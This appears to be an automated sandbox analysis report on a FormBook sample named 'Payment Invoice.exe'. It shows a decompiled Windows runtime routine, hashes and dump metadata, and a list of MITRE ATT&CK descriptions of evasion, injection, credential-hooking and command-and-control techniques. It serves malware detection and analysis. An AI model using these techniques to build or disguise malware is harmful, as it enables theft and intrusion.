				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0372CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03775720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03775720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0377fdda
0x0377fde2
0x0377fde5
0x0377fdec
0x0377fdfa
0x0377fdff
0x0377fe0a
0x0377fe0f
0x0377fe17
0x0377fe1e
0x0377fe19
0x0377fe19
0x0377fe19
0x0377fe20
0x0377fe21
0x0377fe22
0x0377fe25
0x0377fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0377FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0377FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0377FE01

Memory Dump Source

Source File: 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp, Offset: 036C0000, based on PE: true

Associated: 00000015.00000002.911064649.00000000037DB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.911107226.00000000037DF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5c6c1004d75bea15f463ee13c7f3cd9115f56b2e8e30a8a282b2bab090341f93
Instruction ID: 96253ceac523805622eddb1981dcabba1209d0cbb02acd45193dc067ebf7f178
Opcode Fuzzy Hash: 5c6c1004d75bea15f463ee13c7f3cd9115f56b2e8e30a8a282b2bab090341f93
Instruction Fuzzy Hash: A2F0F676600601BFEA209A55DD06F67BF6AEB45730F140318F6285A1D1DAA2F82096F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Payment Invoice.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets